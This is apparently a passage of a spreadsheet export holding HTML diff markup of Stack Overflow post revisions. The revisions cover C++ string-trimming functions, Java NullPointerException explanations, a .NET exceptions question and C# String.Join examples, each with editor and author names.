    s.erase(s.begin(), std::find_if(s.begin(), s.end(), [](&lt;span class="diff-delete"&gt;unsigned char&lt;/span&gt; ch) {_x000D_
        return !std::isspace(ch);_x000D_
    }));_x000D_
}_x000D_
_x000D_
// trim from end (in place)_x000D_
static inline void rtrim(std::string &amp;amp;s) {_x000D_
    s.erase(std::find_if(s.rbegin(), s.rend(), [](&lt;span class="diff-delete"&gt;unsigned char&lt;/span&gt; ch) {_x000D_
        return !std::isspace(ch);_x000D_
    }).base(), s.end());_x000D_
}_x000D_
_x000D_
// trim from both ends (in place)_x000D_
static inline void trim(std::string &amp;amp;s) {_x000D_
    ltrim(s);_x000D_
    rtrim(s);_x000D_
}_x000D_
_x000D_
// trim from start (copying)_x000D_
static inline std::string ltrim_copy(std::string s) {_x000D_
    ltrim(s);_x000D_
    return s;_x000D_
}_x000D_
_x000D_
// trim from end (copying)_x000D_
static inline std::string rtrim_copy(std::string s) {_x000D_
    rtrim(s);_x000D_
    return s;_x000D_
}_x000D_
_x000D_
// trim from both ends (copying)_x000D_
static inline std::string trim_copy(std::string s) {_x000D_
    trim(s);_x000D_
    return s;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#include &amp;lt;algorithm&amp;gt; _x000D_
#include &amp;lt;cctype&amp;gt;_x000D_
#include &amp;lt;locale&amp;gt;_x000D_
_x000D_
// trim from start (in place)_x000D_
static inline void ltrim(std::string &amp;amp;s) {_x000D_
    s.erase(s.begin(), std::find_if(s.begin(), s.end(), [](&lt;span class="diff-add"&gt;int&lt;/span&gt; ch) {_x000D_
        return !std::isspace(ch);_x000D_
    }));_x000D_
}_x000D_
_x000D_
// trim from end (in place)_x000D_
static inline void rtrim(std::string &amp;amp;s) {_x000D_
    s.erase(std::find_if(s.rbegin(), s.rend(), [](&lt;span class="diff-add"&gt;int&lt;/span&gt; ch) {_x000D_
        return !std::isspace(ch);_x000D_
    }).base(), s.end());_x000D_
}_x000D_
_x000D_
// trim from both ends (in place)_x000D_
static inline void trim(std::string &amp;amp;s) {_x000D_
    ltrim(s);_x000D_
    rtrim(s);_x000D_
}_x000D_
_x000D_
// trim from start (copying)_x000D_
static inline std::string ltrim_copy(std::string s) {_x000D_
    ltrim(s);_x000D_
    return s;_x000D_
}_x000D_
_x000D_
// trim from end (copying)_x000D_
static inline std::string rtrim_copy(std::string s) {_x000D_
    rtrim(s);_x000D_
    return s;_x000D_
}_x000D_
_x000D_
// trim from both ends (copying)_x000D_
static inline std::string trim_copy(std::string s) {_x000D_
    trim(s);_x000D_
    return s;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>jotik</t>
  </si>
  <si>
    <t>Evan Teran</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If I need to throw an exception from within my application&lt;span class="diff-delete"&gt;,&lt;/span&gt; which of the built-in .&lt;span class="diff-delete"&gt;NET&lt;/span&gt; exception classes can I use?&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;&amp;nbsp;&lt;/span&gt; Are they all fair-game? When should I derive my own?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If I need to throw an exception from within my application which of the built-in .&lt;span class="diff-add"&gt;net&lt;/span&gt; exception classes can I use? Are they all fair-game? When should I derive my own?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; They're exceptions that occur when you try to use a reference&lt;span class="diff-delete"&gt; variable&lt;/span&gt; that &lt;span class="diff-delete"&gt;doesn't refer&lt;/span&gt; (&lt;span class="diff-delete"&gt;or &lt;/span&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;point&lt;/span&gt;&lt;/em&gt;)&lt;span class="diff-delete"&gt; to any object&lt;/span&gt; as though it &lt;span class="diff-delete"&gt;did. A reference that doesn't refer to&lt;/span&gt; an object&lt;span class="diff-delete"&gt; is called a &lt;/span&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;null reference&lt;/span&gt;&lt;/em&gt;. Calling a method on a null reference or trying to access a field of a null reference will trigger a &lt;code&gt;&lt;span class="diff-delete"&gt;NullPointerException&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; (NPE)&lt;/span&gt;. These are the most common&lt;span class="diff-delete"&gt; ways to get an NPE&lt;/span&gt;, but other ways are listed on the &lt;a href="http://docs.oracle.com/javase/7/docs/api/java/lang/NullPointerException.html" rel="nofollow noreferrer"&gt;NullPointerException&lt;/a&gt; javadoc page.&lt;/p&gt; _x000D_
 &lt;p&gt; Probably the quickest example code I could come up with to illustrate a NPE would be:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;Example&lt;/span&gt;_x000D_
&lt;/span&gt;{_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;static&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;main&lt;/span&gt;&lt;span class="hljs-params"&gt;(String[] args)&lt;/span&gt;_x000D_
    &lt;/span&gt;{_x000D_
        Object obj = &lt;span class="hljs-keyword"&gt;null&lt;/span&gt;;_x000D_
        obj.hashCode();_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; On the first line inside &lt;span class="diff-delete"&gt;the &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;main&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; method&lt;/span&gt; I'm explicitly setting the &lt;code&gt;&lt;span class="diff-delete"&gt;Object&lt;/span&gt;&lt;/code&gt; reference &lt;code&gt;obj&lt;/code&gt; to &lt;code&gt;&lt;span class="diff-delete"&gt;null&lt;/span&gt;&lt;/code&gt;. This means I have a reference, but it isn't pointing to any object. After that, I try to treat the reference as though it points to an object by calling &lt;span class="diff-delete"&gt;an instance&lt;/span&gt; method on it. This results in a NPE because there is no &lt;span class="diff-delete"&gt;object (no instance) against which&lt;/span&gt; to execute the &lt;span class="diff-delete"&gt;given method&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt;(This is a technicality, but I think it bears mentioning: A reference that &lt;span class="diff-delete"&gt;is set&lt;/span&gt; to null isn't the same as a C pointer that points to an invalid memory location. A null &lt;span class="diff-delete"&gt;reference&lt;/span&gt; is literally not pointing &lt;em&gt;anywhere&lt;/em&gt;, which is subtly different than pointing to a location that happens to be invalid.)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; They're exceptions that occur when you try to use a reference that &lt;span class="diff-add"&gt;points to no location in memory&lt;/span&gt; (&lt;span class="diff-add"&gt;null&lt;/span&gt;) as though it &lt;span class="diff-add"&gt;were referencing&lt;/span&gt; an object. Calling a method on a null reference or trying to access a field of a null reference will trigger a &lt;span class="diff-add"&gt;NPE&lt;/span&gt;. These are the most common, but other ways are listed on the &lt;a href="http://docs.oracle.com/javase/7/docs/api/java/lang/NullPointerException.html" rel="nofollow noreferrer"&gt;NullPointerException&lt;/a&gt; javadoc page.&lt;/p&gt; _x000D_
 &lt;p&gt; Probably the quickest example code I could come up with to illustrate a NPE would be:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;Example&lt;/span&gt;_x000D_
&lt;/span&gt;{_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;static&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;main&lt;/span&gt;&lt;span class="hljs-params"&gt;(String[] args)&lt;/span&gt;_x000D_
    &lt;/span&gt;{_x000D_
        Object obj = &lt;span class="hljs-keyword"&gt;null&lt;/span&gt;;_x000D_
        obj.hashCode();_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; On the first line inside &lt;span class="diff-add"&gt;main&lt;/span&gt; I'm explicitly setting the &lt;span class="diff-add"&gt;Object&lt;/span&gt; reference &lt;code&gt;obj&lt;/code&gt; to &lt;span class="diff-add"&gt;null&lt;/span&gt;. This means I have a reference, but it isn't pointing to any object. After that, I try to treat the reference as though it points to an object by calling &lt;span class="diff-add"&gt;a&lt;/span&gt; method on it. This results in a NPE because there is no &lt;span class="diff-add"&gt;code&lt;/span&gt; to execute&lt;span class="diff-add"&gt; in&lt;/span&gt; the &lt;span class="diff-add"&gt;location that the reference is pointing&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt;(This is a technicality, but I think it bears mentioning: A reference that &lt;span class="diff-add"&gt;points&lt;/span&gt; to null isn't the same as a C pointer that points to an invalid memory location. A null &lt;span class="diff-add"&gt;pointer&lt;/span&gt; is literally not pointing &lt;em&gt;anywhere&lt;/em&gt;, which is subtly different than pointing to a location that happens to be invalid.)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Steve Powell</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; A NULL pointer is one that points to nowhere. When you dereference a pointer "p", you say "give me the data at the location stored in "p". When p is a null pointer, the location stored in "p" is "nowhere", you're saying "give me the data at the location 'nowhere'". Obviously it can't do this, so it throws a &lt;code&gt;&lt;span class="diff-delete"&gt;NullPointerException&lt;/span&gt;&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; In general, it's because something hasn't been initialized properly.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; A NULL pointer is one that points to nowhere. When you dereference a pointer "p", you say "give me the data at the location stored in "p". When p is a null pointer, the location stored in "p" is "nowhere", you're saying "give me the data at the location 'nowhere'". Obviously it can't do this, so it throws a &lt;span class="diff-add"&gt;NULL pointer exception&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; In general, it's because something hasn't been initialized properly.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>MrZebra</t>
  </si>
  <si>
    <t>iliketocode</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; While it is not strictly part of LINQ, &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;String.Join&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; is performant method to concatenate strings from sequences. There's an &lt;/span&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/dd783876.aspx" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;overload&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; that accepts &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;IEnumerable&amp;lt;string&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;. The code would then look like:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;return string.Join(", ", strings&lt;span class="diff-delete"&gt;);_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; If you start from list of objects and not just strings - select property first ("Name" in this example):&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;return string.Join(", ", elements.Select(x =&amp;gt; x.Name));_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; If property is not a string (i.e. &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;int&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;) call &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;ToString&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; on it. Note that not every type has meaningful &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;ToString&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;):&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;return string.Join(", ", elements&lt;/span&gt;.&lt;span class="diff-delete"&gt;Select(x =&amp;gt; x.IntValue.ToString&lt;/span&gt;(&lt;span class="diff-delete"&gt;)&lt;/span&gt;));_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; If you need to concatenate strings without separator use &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;String.Concat(strings)&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; instead of passing empty separator to &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;String.Join("", strings)&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;If you have to use version of&lt;/span&gt; .Net&lt;span class="diff-delete"&gt; prior&lt;/span&gt; 4 &lt;span class="diff-delete"&gt;(where version of&lt;/span&gt; &lt;code&gt;&lt;span class="diff-delete"&gt;String&lt;/span&gt;.Join&lt;/code&gt; &lt;span class="diff-delete"&gt;taking enumerable was intorduced) you still can use&lt;/span&gt; &lt;code&gt;&lt;span class="diff-delete"&gt;String.Join&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; by converting enumerable to array&lt;/span&gt;. &lt;span class="diff-delete"&gt;Note that it is more wasteful due to an extra array compared to&lt;/span&gt; code &lt;span class="diff-delete"&gt;in the question - make sure it satisfy your performance goals&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;return string.Join(", ", strings&lt;span class="diff-delete"&gt;.ToArray()&lt;/span&gt;);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;return string.Join(", ", strings.&lt;span class="diff-add"&gt;ToArray&lt;/span&gt;());_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;In&lt;/span&gt; .Net 4&lt;span class="diff-add"&gt;, there's a new&lt;/span&gt; &lt;a href="http://msdn.microsoft.com/en-us/library/dd783876.aspx" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;overload&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; for&lt;/span&gt; &lt;code&gt;&lt;span class="diff-add"&gt;string&lt;/span&gt;.Join&lt;/code&gt; &lt;span class="diff-add"&gt;that accepts&lt;/span&gt; &lt;code&gt;&lt;span class="diff-add"&gt;IEnumerable&amp;lt;string&amp;gt;&lt;/span&gt;&lt;/code&gt;. &lt;span class="diff-add"&gt; The&lt;/span&gt; code &lt;span class="diff-add"&gt;would then look like&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;return string.Join(", ", strings);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Alexei Levenkov</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Legibility&lt;/li&gt; _x000D_
  &lt;li&gt; Easy to use a object and serialise it ( &lt;code&gt;{store: 11200, product: "Meat"}&lt;/code&gt;)&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Legibility&lt;/li&gt; _x000D_
  &lt;li&gt; Easy to use a object and serialise it ( &lt;code&gt;{store: 11200, product: "Meat"}&lt;/code&gt;)&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; Legibility&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Mihai Alexandru-Ionut</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; When you declare a reference variable (i.e. an object) you are really creating a pointer to an object. Consider the following code where you declare a variable of primitive type &lt;code&gt;int&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;int&lt;/span&gt; x;_x000D_
x = &lt;span class="hljs-number"&gt;10&lt;/span&gt;;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In this example, the variable &lt;code&gt;x&lt;/code&gt; is an &lt;code&gt;int&lt;/code&gt; and Java will initialize it to &lt;code&gt;0&lt;/code&gt; for you. When you assign it the value of &lt;code&gt;10&lt;/code&gt; on the second line, your value of &lt;code&gt;10&lt;/code&gt; is written into the memory location referred to by &lt;code&gt;x&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; But, when you try to declare a reference &lt;em&gt;type&lt;/em&gt;, something different happens. Take the following code:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;Integer num;_x000D_
num = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; Integer(&lt;span class="hljs-number"&gt;10&lt;/span&gt;);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The first line declares a variable named &lt;code&gt;num&lt;/code&gt;, but it does not actually contain a primitive value yet. Instead, it contains a pointer (because the type is &lt;code&gt;Integer&lt;/code&gt; which is a reference type). Since you have not yet said what to point to, Java sets it to &lt;code&gt;null&lt;/code&gt;, which means "&lt;strong&gt;I am pointing to &lt;em&gt;nothing&lt;/em&gt;&lt;/strong&gt;".&lt;/p&gt; _x000D_
 &lt;p&gt; In the second line, the &lt;code&gt;new&lt;/code&gt; keyword is used to instantiate (or create) an object of type &lt;code&gt;Integer&lt;/code&gt; and the pointer variable &lt;code&gt;num&lt;/code&gt; is assigned to that &lt;code&gt;Integer&lt;/code&gt; object.&lt;/p&gt; _x000D_
 &lt;p&gt; The &lt;code&gt;NullPointerException&lt;/code&gt; occurs when you declare a variable but did not create an object. So you are pointing to something that does not actually exist.&lt;/p&gt; _x000D_
 &lt;p&gt; If you attempt to dereference &lt;code&gt;num&lt;/code&gt; BEFORE creating the object you get a &lt;code&gt;NullPointerException&lt;/code&gt;. In the most trivial cases, the compiler will catch the problem and let you know that "&lt;code&gt;num may not have been initialized&lt;/code&gt;," but sometimes you may write code that does not directly create the object.&lt;/p&gt; _x000D_
 &lt;p&gt; For instance, you may have a method as follows:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;doSomething&lt;/span&gt;&lt;span class="hljs-params"&gt;(SomeObject obj)&lt;/span&gt; &lt;/span&gt;{_x000D_
   &lt;span class="hljs-comment"&gt;//do something to obj&lt;/span&gt;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In which case, you are not creating the object &lt;code&gt;obj&lt;/code&gt;, but rather assuming that it was created before the &lt;code&gt;doSomething()&lt;/code&gt; method was called. Note, it is possible to call the method like this:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;doSomething(&lt;span class="hljs-keyword"&gt;null&lt;/span&gt;);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In which case, &lt;code&gt;obj&lt;/code&gt; is &lt;code&gt;null&lt;/code&gt;. If the method is intended to do something to the passed-in object, it is appropriate to throw the &lt;code&gt;NullPointerException&lt;/code&gt; because it's a programmer error and the programmer will need that information for debugging purposes.&lt;/p&gt; _x000D_
 &lt;p&gt; Alternatively, there may be cases where the purpose of the method is not solely to operate on the passed in object, and therefore a null parameter may be acceptable. In this case, you would need to check for a &lt;strong&gt;null parameter&lt;/strong&gt; and behave differently. You should also explain this in the documentation. For example, &lt;code&gt;doSomething()&lt;/code&gt; could be written as:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-comment"&gt;/**_x000D_
  * &lt;span class="hljs-doctag"&gt;@param&lt;/span&gt; obj An optional foo for ____. May be null, in which case _x000D_
  *  the result will be ____._x000D_
  */&lt;/span&gt;_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;doSomething&lt;/span&gt;&lt;span class="hljs-params"&gt;(SomeObject obj)&lt;/span&gt; &lt;/span&gt;{_x000D_
    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt;(obj != &lt;span class="hljs-keyword"&gt;null&lt;/span&gt;) {_x000D_
       &lt;span class="hljs-comment"&gt;//do something&lt;/span&gt;_x000D_
    } &lt;span class="hljs-keyword"&gt;else&lt;/span&gt; {_x000D_
       &lt;span class="hljs-comment"&gt;//do something else&lt;/span&gt;_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Finally, &lt;a href="https://stackoverflow.com/q/3988788/2775450"&gt;How to pinpoint the exception &amp;amp; cause using Stack Trace&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; EDIT from @Perimosh&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; I wanted to add something, but can't comment so I'm adding it here. Don't you ever catch NullPointerException! It is a terrible practice. If you are doing this, it means most likely you have a bug in your code.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; When you declare a reference variable (i.e. an object) you are really creating a pointer to an object. Consider the following code where you declare a variable of primitive type &lt;code&gt;int&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;int&lt;/span&gt; x;_x000D_
x = &lt;span class="hljs-number"&gt;10&lt;/span&gt;;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In this example, the variable &lt;code&gt;x&lt;/code&gt; is an &lt;code&gt;int&lt;/code&gt; and Java will initialize it to &lt;code&gt;0&lt;/code&gt; for you. When you assign it the value of &lt;code&gt;10&lt;/code&gt; on the second line, your value of &lt;code&gt;10&lt;/code&gt; is written into the memory location referred to by &lt;code&gt;x&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; But, when you try to declare a reference &lt;em&gt;type&lt;/em&gt;, something different happens. Take the following code:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;Integer num;_x000D_
num = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; Integer(&lt;span class="hljs-number"&gt;10&lt;/span&gt;);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The first line declares a variable named &lt;code&gt;num&lt;/code&gt;, but it does not actually contain a primitive value yet. Instead, it contains a pointer (because the type is &lt;code&gt;Integer&lt;/code&gt; which is a reference type). Since you have not yet said what to point to, Java sets it to &lt;code&gt;null&lt;/code&gt;, which means "&lt;strong&gt;I am pointing to &lt;em&gt;nothing&lt;/em&gt;&lt;/strong&gt;".&lt;/p&gt; _x000D_
 &lt;p&gt; In the second line, the &lt;code&gt;new&lt;/code&gt; keyword is used to instantiate (or create) an object of type &lt;code&gt;Integer&lt;/code&gt; and the pointer variable &lt;code&gt;num&lt;/code&gt; is assigned to that &lt;code&gt;Integer&lt;/code&gt; object.&lt;/p&gt; _x000D_
 &lt;p&gt; The &lt;code&gt;NullPointerException&lt;/code&gt; occurs when you declare a variable but did not create an object. So you are pointing to something that does not actually exist.&lt;/p&gt; _x000D_
 &lt;p&gt; If you attempt to dereference &lt;code&gt;num&lt;/code&gt; BEFORE creating the object you get a &lt;code&gt;NullPointerException&lt;/code&gt;. In the most trivial cases, the compiler will catch the problem and let you know that "&lt;code&gt;num may not have been initialized&lt;/code&gt;," but sometimes you may write code that does not directly create the object.&lt;/p&gt; _x000D_
 &lt;p&gt; For instance, you may have a method as follows:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;doSomething&lt;/span&gt;&lt;span class="hljs-params"&gt;(SomeObject obj)&lt;/span&gt; &lt;/span&gt;{_x000D_
   &lt;span class="hljs-comment"&gt;//do something to obj&lt;/span&gt;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In which case, you are not creating the object &lt;code&gt;obj&lt;/code&gt;, but rather assuming that it was created before the &lt;code&gt;doSomething()&lt;/code&gt; method was called. Note, it is possible to call the method like this:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;doSomething(&lt;span class="hljs-keyword"&gt;null&lt;/span&gt;);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In which case, &lt;code&gt;obj&lt;/code&gt; is &lt;code&gt;null&lt;/code&gt;. If the method is intended to do something to the passed-in object, it is appropriate to throw the &lt;code&gt;NullPointerException&lt;/code&gt; because it's a programmer error and the programmer will need that information for debugging purposes.&lt;/p&gt; _x000D_
 &lt;p&gt; Alternatively, there may be cases where the purpose of the method is not solely to operate on the passed in object, and therefore a null parameter may be acceptable. In this case, you would need to check for a &lt;strong&gt;null parameter&lt;/strong&gt; and behave differently. You should also explain this in the documentation. For example, &lt;code&gt;doSomething()&lt;/code&gt; could be written as:&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-comment"&gt;/**_x000D_
  * &lt;span class="hljs-doctag"&gt;@param&lt;/span&gt; obj An optional foo for ____. May be null, in which case _x000D_
  *  the result will be ____._x000D_
  */&lt;/span&gt;_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;doSomething&lt;/span&gt;&lt;span class="hljs-params"&gt;(SomeObject obj)&lt;/span&gt; &lt;/span&gt;{_x000D_
    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt;(obj != &lt;span class="hljs-keyword"&gt;null&lt;/span&gt;) {_x000D_
       &lt;span class="hljs-comment"&gt;//do something&lt;/span&gt;_x000D_
    } &lt;span class="hljs-keyword"&gt;else&lt;/span&gt; {_x000D_
       &lt;span class="hljs-comment"&gt;//do something else&lt;/span&gt;_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Finally, &lt;a href="https://stackoverflow.com/q/3988788/2775450"&gt;How to pinpoint the exception &amp;amp; cause using Stack Trace&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
